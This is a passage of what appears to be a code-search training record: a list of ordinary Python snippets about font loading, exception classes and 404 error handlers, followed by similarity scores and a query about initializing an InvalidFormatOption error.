_ = '%s: Family name \"%s\" does not match font name: \"%s\"'\n _ = _ % (font_metadata.filename, fm.name, font_metadata.name)\n self.assertEqual(font_metadata.name, fm.name, _)", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def page_not_found(error):\n error_message = str(error)\n return render_template('error-pages/404-page.html', error_message=error_message, isFooter=True), 404", "def addFont(self, name, family=\"nil\", alt=None):\n\n id = len(self.fonts)\n self.fonts.append(Font(id, name, family, alt))\n return id", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def notfound(error):\n\n categories = [ \"business\",\n \"entertainment\",\n \"general\",\n \"health\",\n \"science\",\n \"sports\",\n \"technology\"\n ]\n return render_template(\"notfound.html\", categories = categories), 404", "def not_found(error):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n 'error': error}\n resp = jsonify(message)\n return resp", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def page_not_found(error):\n return render_template('error.html', error_msg=\"404 Page Not Found\", pagetitle=\"404 Page Not Found\"), 404", "def __setup__(cls):\n super(Country, cls).__setup__()\n cls._error_messages.update({\n 'country_not_found': 'Country with ISO code %s does not exist.',\n })", "def fontforge_skip_checks():\n return None", "def fontforge_skip_checks():\n return None", "def test_file_invalid(self) 
-> None:\n with pytest.raises(FileNotFoundError) as ex:\n CSSFormatter.format(\"/invalid/file.css\")\n assert \"No such file or directory\" in str(ex)", "def getFont(fontsize):\n\t\t\n\tfontPath = os.path.join(GATEWAYPATH, \"pilfonts\", \"FreeSans.ttf\")\n\ttry:\n\t\tfont = ImageFont.truetype ( fontPath, fontsize )\t\n\texcept:\n\t\tfont = ImageFont.load('%s/pilfonts/B%0.2d.pil' % (GATEWAYPATH, 24) )\n\treturn font", "def get_font_map(self): # real signature unknown; restored from __doc__\n pass", "def GetItemFont(self, item):\r\n\r\n font = item.Attr().GetFont()\r\n if font.IsOk():\r\n return font\r\n\r\n return wx.NullFont", "def pkg_not_found_mess(pkgname: str, reponame: str) -> None:\n meta = MainData()\n print(('{0}Package {1}{2} {0}not found in \\'{3}\\' '\n 'repository.{4}').format(meta.clrs['red'],\n meta.clrs['lcyan'],\n pkgname,\n reponame,\n meta.clrs['reset']))", "def _page_not_found():\n return render_template(\n \"error.html\",\n title=\"Page Not Found\"\n ), 404", "def load_font(font_path):\n\n # ttc is collection of ttf\n if font_path.endswith('ttc'):\n ttc = TTCollection(font_path)\n # assume all ttfs in ttc file have same supported chars\n return ttc.fonts[0]\n\n if font_path.endswith('ttf') or font_path.endswith('TTF') or font_path.endswith('otf'):\n ttf = TTFont(font_path, 0, allowVID=0,\n ignoreDecompileErrors=True,\n fontNumber=-1)\n\n return ttf", "def not_found_404(error):\n return jsonify({\n 'success': False,\n 'message': 'Resource not found',\n 'error': 404\n }), 404", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def GetFont(*args, **kwargs):\n return _gdi_.StockGDI_GetFont(*args, **kwargs)", "def display_404(error):\n return render_template('/error.html'), 404", "def _load_font(file: str) -> None:\n\n pyglet.font.add_file(Config.RES_DIR + \"font\" + Config.FILE_SEPARATOR + file)\n pyglet.font.load(\"Munro\")", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def print_file_notfound(cls, filename):\n print(\n f\"{cls.ERROR_PREFIX} {cls.FILE_NOTFOUND_MESSAGE} '{realpath(filename)}'.\"\n )", "def test_loading_a_text_style_with_extended_font_data(self, sdoc):\n tdoc = ezdxf.new()\n loader = xref.Loader(sdoc, tdoc)\n loader.load_text_styles([\"arial\"])\n loader.execute()\n assert document_has_no_errors(tdoc) is True\n\n arial = tdoc.styles.get(\"arial\")\n assert arial.dxf.name == \"ARIAL\", \"expected text style ARIAL in target doc\"\n\n family, italic, bold = arial.get_extended_font_data()\n assert family == \"Arial\"\n assert italic is False\n assert bold is True" ]
[ "0.6292298", "0.58811384", "0.58719945", "0.5639031", "0.5628314", "0.5543856", "0.54289997", "0.5320911", "0.53068715", "0.5306131", "0.5293901", "0.5212471", "0.52075624", "0.5191999", "0.5174318", "0.5155786", "0.51508164", "0.5130566", "0.5123885", "0.5118684", "0.5100034", "0.5097503", "0.5090377", "0.507855", "0.5064881", "0.5063999", "0.5059373", "0.50567025", "0.5051704", "0.50269526", "0.5023491", "0.5007765", "0.49983537", "0.49976748", "0.49928713", "0.4991232", "0.49891874", "0.49853298", "0.49761394", "0.49758476", "0.49744433", "0.49478176", "0.49378997", "0.49317697", "0.49217567", "0.4912418", "0.49117747", "0.4902056", "0.49012852", "0.4899893", "0.4896483", "0.4879558", "0.48707148", "0.4866485", "0.48497438", "0.48489156", "0.4845103", "0.48404682", "0.4832499", "0.4826534", "0.48177898", "0.48007286", "0.4784393", "0.47841492", "0.47811326", "0.477736", "0.4775644", "0.47741666", "0.4773817", "0.47717208", "0.47672758", "0.47634253", "0.476183", "0.47452328", "0.47414875", "0.4740219", "0.47398108", "0.47313017", "0.4726423", "0.47134456", "0.47096443", "0.47067395", "0.47032934", "0.4702815", "0.4699342", "0.4699342", "0.46977085", "0.4696576", "0.46889737", "0.46885058", "0.46506056", "0.4650418", "0.4650051", "0.4648397", "0.46441746", "0.4638734", "0.46375677", "0.46369842", "0.46334854", "0.46246058", "0.46245387" ]
0.0
-1
Initializes InvalidColorFormat with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_color__int_arg_invalid(self):\n with self.assertRaises(ValueError):\n color = pygame.Color(0x1FFFFFFFF)", "def throwColorError(type, r,g,b):\n\t\tif not (r >= 0): \n\t\t\tError.wrong_color_number(type, r)\n\t\telif not (g >= 0):\n\t\t\tError.wrong_color_number(type, g)\n\t\telse:\n\t\t\tError.wrong_color_number(type, b)", "def print_illegal_color_format_screen( enteredBGColor, enteredFGColor, convertedBGColor, convertedFGColor ):\n print \"\"\n print \"Error: are the passed in colors valid?\"\n print \" - passed in background-color '\" + enteredBGColor + \"' was converted to '\" + convertedBGColor + \"'.\"\n print \" - passed in foreground-color '\" + enteredFGColor + \"' was converted to '\" + convertedFGColor + \"'.\"\n print \"\"", "def test_color__rgba_int_args_invalid_value(self):\n self.assertRaises(ValueError, pygame.Color, 257, 10, 105, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 257, 105, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 257, 44)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 44, 257)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, r, g, b, struct=None):\n self._intern = struct or dlib.Color(r,g,b)", "def test_is_valid_color(self):\n self.assertTrue(is_valid_color('black'))\n self.assertTrue(is_valid_color('#aabb11'))\n self.assertTrue(is_valid_color('rgba(23,45,67, .5)'))\n self.assertFalse(is_valid_color('bl(ack'))", "def testConstructor(self):\n self.assertEquals(Color.RED, Color('RED'))\n self.assertEquals(Color.RED, Color(u'RED'))\n self.assertEquals(Color.RED, Color(20))\n if six.PY2:\n self.assertEquals(Color.RED, Color(long(20)))\n self.assertEquals(Color.RED, Color(Color.RED))\n self.assertRaises(TypeError, Color, 'Not exists')\n self.assertRaises(TypeError, Color, 'Red')\n self.assertRaises(TypeError, Color, 100)\n self.assertRaises(TypeError, Color, 10.0)", "def error(text):\n return color_str(text, 'RED')", "def test_color_field_states_invalid_input(self):\r\n # Field to color not in mapping file.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Fooz', ['a', 'b'], 'Bar')\r\n\r\n # Field to color by not in mapping file.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Foo', ['a', 'b'], 'Barz')\r\n\r\n # Field states are not found in field (due to subset of sample IDs).\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5'], 'Foo', ['a', 'c'], 'Bar')\r\n\r\n # Field states are not found in field (not in column at all).\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5', '6'], 'Foo', ['a', 'c', 'z'], 'Bar')\r\n\r\n # Not enough colors.\r\n samp_ids = [str(i) for i in range(1, 31)]\r\n self.assertRaises(ValueError, _color_field_states,\r\n self.too_many_colors_map_f, samp_ids, 'Description', samp_ids,\r\n 
'Description')\r\n\r\n # No one-to-one mapping.\r\n self.assertRaises(ValueError, _color_field_states, self.map_f,\r\n ['1', '2', '3', '4', '5', '6'], 'Foo', ['a', 'c', 'b'], 'Baz')", "def test_colors_fail_uncalibrated(self):\n command = ('{0} -b 100 -e {1} {2} {2} {3}').format(\n os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_ev' + HEN_FILE_EXTENSION),\n 3, 5, 10)\n with pytest.raises(ValueError) as excinfo:\n hen.colors.main(command.split())\n\n assert \"No energy information is present \" in str(excinfo.value)", "def test_color__sequence_arg_invalid_format(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((100,)))\n self.assertRaises(ValueError, cls, seq_type((100, 90)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 80, 70, 60)))", "def __init__(self, input_color, location, white_symbol, black_symbol):\n assert isinstance(input_color, Color)\n assert isinstance(location, Location)\n assert isinstance(white_symbol, str)\n assert isinstance(black_symbol, str)\n\n self.color = input_color\n self.location = location\n\n if self.color == color.white:\n self.symbol = white_symbol\n else:\n self.symbol = black_symbol", "def style_error(msg='{}'):\n red_code = '\\033[0;31m'\n return text_color(msg, red_code)", "def from_string(cls, text_color):\n\n a = 255\n try:\n r, g, b, a = text_color.replace('rgb(', '').replace(')', '').split(',')\n except ValueError:\n r, g, b = text_color.replace('rgb(', '').replace(')', '').split(',')\n\n return cls(int(r), int(g), int(b), int(a))", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def from_str (s):\n try: \n return from_csv(s)\n except Exception: \n pass\n \n try: \n return from_hex(s)\n except Exception: \n pass\n\n try:\n return from_name(s)\n except Exception: \n pass\n\n raise ColourFormatError(\"'%s' is not a recognized colour string\"%s)", "def __init__(self, r, g, b):\n if r < 0 or r > 255: raise ValueError(\"r value is out of range: %d\"%r)\n if g < 0 or g > 255: raise ValueError(\"g value is out of range: %d\"%g)\n if b < 0 or b > 255: raise ValueError(\"b value is out of range: %d\"%b)\n \n self.r, self.g, self.b = r, g, b", "def __init__(self, *rgb):\n self.alpha = 255\n if len(rgb) == 1:\n\t #Accept a string in the hext fromat made by color_rgb func.\n\t if isinstance(rgb[0],str):\n self.rgb = rgb_color(rgb[0])\n\t else:\n self.rgb=rgb[0]\n elif len(rgb) == 3:\n self.rgb = rgb\n elif len(rgb) == 4:\n self.rgb = rgb[:-1]\n self.alpha = rgb[-1]\n else:\n raise AttributeError, \"invalid arguments to Color(); needs at least 3 integers: red, green, blue (transparency optional)\"\n self.rgb = map(lambda v: int(max(min(v,255),0)), self.rgb)", "def test_color__rgba_int_args_invalid_value_without_alpha(self):\n self.assertRaises(ValueError, pygame.Color, 256, 10, 105)\n self.assertRaises(ValueError, pygame.Color, 10, 256, 105)\n self.assertRaises(ValueError, pygame.Color, 10, 105, 256)", "def format_error(type, message):\n return colored(type + ': ', 'red', attrs=['bold']) + message", "def from_color(cls, color):\n\n color = ('rgb(%d, %d, %d, %d)' % color.getRgb())\n return cls.from_string(color)", "def parse_color(self):\n begin = self.tokenizer.next()\n begin.must_be('{')\n for name in self.tokenizer:\n if name.text == '}': return\n name.must_match(\"^[A-Za-z]\", \"%d:%d: Expected a color name, got %s instead.\" % (name.line, name.col, name.text))\n midpunct = 
self.tokenizer.next()\n if midpunct.text == \"{\":\n color = self.mkColor(name)\n if color in self.ColorDefinitions:\n raise Exception(\"%d:%d: Color %s has already been defined.\" % (name.line, name.col, name.text))\n self.ColorDefinitions[name.text] = color\n elif midpunct.text == ':':\n stack = []\n for token in self.tokenizer:\n if token.text == \".\":\n self.OrderedColorMappings += [Mapping(name,stack)]\n break\n elif token.text == \"}\": raise Exception(\"%d:%d: Color section ended while defining mapping for color %s\" % (name.line, name.col, name.text))\n try:\n stack += [ self.GlobalSymbolDict[token.text] ]\n except:\n raise Exception(\"%d:%d: Literal %s does not occur in the grammar\" % (token.line, token.col, token.text))\n \n elif midpunct.text == '}': raise Exception(\"%d:%d: Coloring section ended unexpectedly here.\" % (token.line, token.col))\n else: raise Exception(\"%d:%d: Expected : or {, not %s\" % (midpunct.line, midpunct.col, midpunct.text))\n raise Exception(\"%d:%d: Unexpected end-of-file while scanning color definition section beginning here.\" % (begin.line, begin.col))", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def test_is_valid_color_name(self):\n self.assertTrue(is_valid_color_name('black'))\n self.assertTrue(is_valid_color_name('red'))\n self.assertFalse(is_valid_color_name('#aabb11'))\n self.assertFalse(is_valid_color_name('bl(ack'))", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ColorRangeHSV, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.h_min is None:\n self.h_min = 0\n if self.h_max is None:\n self.h_max = 0\n if self.s_min is None:\n self.s_min = 0.\n if self.s_max is None:\n self.s_max = 0.\n if self.v_min is None:\n self.v_min = 0.\n if self.v_max is None:\n self.v_max = 0.\n else:\n self.h_min = 0\n self.h_max = 0\n self.s_min = 0.\n self.s_max = 0.\n self.v_min = 0.\n self.v_max = 0.", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. 
\"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, registration_number, color):\n self._reg_number = registration_number\n self._color = color", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, color):\n super().__init__(color)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def color_invalid(self):\n for i in self.invalid:\n self.color_cell(i, INVALID)", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\n self.colour = target_colour", "def test_color__sequence_arg_invalid_value(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((256, 90, 80, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 256, 80, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 256, 70)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 80, 256)))", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, *args, **kwargs):\n self._supports_color = supports_color()\n super(ColorLoggerMixin, self).__init__(*args, **kwargs)", "def test_is_valid_rgb_color(self):\n self.assertTrue(is_valid_rgb_color('rgb(12,23,5)'))\n self.assertTrue(is_valid_rgb_color('rgb(12, 223, 225)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 1)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 1.0)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, 0)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, .3)'))\n self.assertTrue(is_valid_rgb_color('rgba(12, 223, 225, .34521)'))\n\n # invalid cases\n self.assertFalse(is_valid_rgb_color('rgb(12, 223, 225, 0.5)'))\n self.assertFalse(is_valid_rgb_color('rgb(12, 223, 225, 5)'))\n self.assertFalse(is_valid_rgb_color('rgb(1234, 223, 225)'))\n self.assertFalse(is_valid_rgb_color('rgba(1234, 223, 225,.5)'))\n self.assertFalse(is_valid_rgb_color('rgba(1234, 223, 225,1.1)'))", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def test_color__sequence_arg_invalid_value_without_alpha(self):\n cls = pygame.Color\n for seq_type in (tuple, list):\n self.assertRaises(ValueError, cls, seq_type((256, 90, 80)))\n self.assertRaises(ValueError, cls, seq_type((100, 256, 80)))\n self.assertRaises(ValueError, cls, seq_type((100, 90, 256)))", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def __init__(self, target_colour: Tuple[int, int, int]) -> None:\r\n self.colour = target_colour", "def after_init(self) -> None:\n if self.options.format.lower() != \"default_notebook\":\n self.error_format = self.options.format\n if not hasattr(self, \"color\"):\n self.color = True", "def _init_colors(self):\n self.clr_primary = None\n self.clr_secondary = 
'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'", "def __init__(self, init_val):\n self.err_fig_num = init_val\n self.disp_fig_num = init_val", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def test_car_object_color_when_color_type_is_invalid_raises_exception():\n # Arrange\n color = 1\n max_speed = 30\n acceleration = 10\n tyre_friction = 3\n\n # Act\n with pytest.raises(Exception) as e:\n assert Car(color=color, max_speed=max_speed,\n acceleration=acceleration, tyre_friction=tyre_friction)\n\n # Assert\n assert str(e.value) == \"Invalid value for color\"", "def __init__(self, colors=('red', 'blue'), **kwargs):\n self._colors = list(map(mcolors.to_rgba, colors))\n super().__init__(color=self._colors[0], **kwargs)", "def __init__(self, colors=('red', 'blue'), **kwargs):\n self._colors = list(map(mcolors.to_rgba, colors))\n super().__init__(color=self._colors[0], **kwargs)", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def test_init_no_args(self):\n\n fill = FillColor()\n self.assertEqual((0, 0, 0), fill.color)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, colorNames):\n self._lengthOfPattern = 0 # will later be queried from the user\n self._palette = '' # initials for color choices, e.g., R for red\n for color in colorNames:\n self._palette += color[0].upper()", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, data, validate=False):\n self._validate = validate\n super(StyleFormats, self).__init__(data or 
{})", "def __init__(self, *args, **kwargs):\n _gdi_.Colour_swiginit(self,_gdi_.new_Colour(*args, **kwargs))", "def __init__(self, red=Black.red, green=Black.green, blue=Black.blue):\n self.color = Color(red, green, blue)\n\n self.template = '\\ttextcolor = {textcolor};\\n'", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, port):\n super(InvalidPort, self).__init__(\n 'The port (\"{0}\") is not valid.'.format(port))", "def __init__(self, month, day, name, color_code):\n self.color_code = color_code\n self.day = day\n self.month = month\n self.name = name", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def print_err(*vargs, **kwargs):\n _do_print_color(*vargs, colorcode = 31, **kwargs)", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def error(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def check_color_scoping(self):\n for mapping in self.OrderedColorMappings:\n if mapping.token.text not in self.ColorDefinitions:\n raise Exception(\"%d:%d Color %s is never defined\" % (mapping.token.line, mapping.token.col, mapping.token.text))", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message, fatal, error_num=None):\n Exception.__init__(self, message)\n self.fatal = fatal\n self.errno = error_num", "def is_invalid():\n print(colored('Invalid input\\n', 'red', attrs=['bold']))", "def error_message(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def _validate_color(color):\n if not isinstance(color, (list, tuple)):\n raise ValueError(\"Color has to be list, or tuple\")\n if 
len(color) != 3:\n raise ValueError(\"Color have to contain exactly 3 values: [R, G, B]\")\n for channel in color:\n validate_channel_value(channel)", "def __init__(self, color: str, smell: str):\n self.color = color\n self.smell = smell", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def initFormat(self):\n pass", "def format_color(\n color: Union[ColorInputType, Any],\n warn_if_invalid: bool = True\n) -> Union[ColorType, Any]:\n if not isinstance(color, ColorInputInstance):\n return color\n if not isinstance(color, pygame.Color):\n try:\n if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:\n if PYGAME_V2:\n for j in color:\n if not isinstance(j, int):\n raise ValueError('color cannot contain floating point values')\n c = pygame.Color(*color)\n else:\n c = pygame.Color(color)\n except ValueError:\n if warn_if_invalid:\n warn(f'invalid color value \"{color}\"')\n else:\n raise\n return color\n else:\n c = color\n return c.r, c.g, c.b, c.a", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def clean_colors(self):\n err = _(\"Color must be a valid hex triplet.\")\n colors = ['background_color_custom', 'font_color_custom']\n colors2 = colors + ['background_color', 'font_color']\n # If there are custom colors specified in settings, length of\n # self.COLORS will be > 6, so check for validity\n if len(self.COLORS) > 6:\n colors = colors2\n for color in colors:\n c = getattr(self, color)\n l = len(c)\n if l:\n if l != 6:\n raise ValidationError(err)\n else:\n try:\n int(c, 16)\n except ValueError:\n raise ValidationError(err)", "def invalid_colour(colour):\n error_message = f\"`{colour}` is not a valid RGB colour\"\n\n if not isinstance(colour, list):\n return error_message\n\n if not all([0 <= component <= 255 for component in colour]):\n return error_message\n\n return False", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def __init__(self, red, green, blue, alpha = 255):\n self._red = red\n self._green = green\n self._blue = blue \n self._alpha = alpha", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n 
definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_init__invalid_logger_fails(self):\n\n class InvalidLogger:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"logger\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(logger=InvalidLogger())", "def __init__(self, message, code=None):\n WebSocketError.__init__(self, message)\n self.code = code", "def on_init_fail(self, event_time, message):\n pass" ]
[ "0.6307895", "0.5999552", "0.5958542", "0.56025517", "0.55953807", "0.5590387", "0.5570816", "0.55706704", "0.5564297", "0.55582446", "0.55362266", "0.55183357", "0.5498367", "0.5497162", "0.54941034", "0.5482115", "0.5468498", "0.5452355", "0.5448693", "0.54256946", "0.5418703", "0.54101783", "0.54027694", "0.5402317", "0.53902507", "0.538478", "0.53728807", "0.53705204", "0.53621274", "0.5359727", "0.5347986", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5341526", "0.5336727", "0.5334468", "0.5331238", "0.5319294", "0.5319294", "0.53119016", "0.5297035", "0.52946085", "0.5287633", "0.52754486", "0.527235", "0.52665", "0.52665", "0.52665", "0.5235684", "0.52202296", "0.52148396", "0.5204299", "0.5200045", "0.5191352", "0.5191352", "0.51893973", "0.5187414", "0.518395", "0.5176848", "0.51673245", "0.5162832", "0.5161432", "0.51483285", "0.5147621", "0.5146641", "0.5135498", "0.5135047", "0.5127958", "0.5119854", "0.51145357", "0.51069397", "0.51051193", "0.5104853", "0.50991875", "0.5086483", "0.50843686", "0.50840026", "0.50797045", "0.50736845", "0.5071013", "0.5067281", "0.50591683", "0.50556713", "0.5054711", "0.5045396", "0.5030684", "0.50281197", "0.5019731", "0.50173056", "0.5012203", "0.5010799", "0.500244", "0.50001514", "0.4999452", "0.49982768", "0.49930125", "0.49888757" ]
0.0
-1
Initializes InvalidFormatOption with an error message.
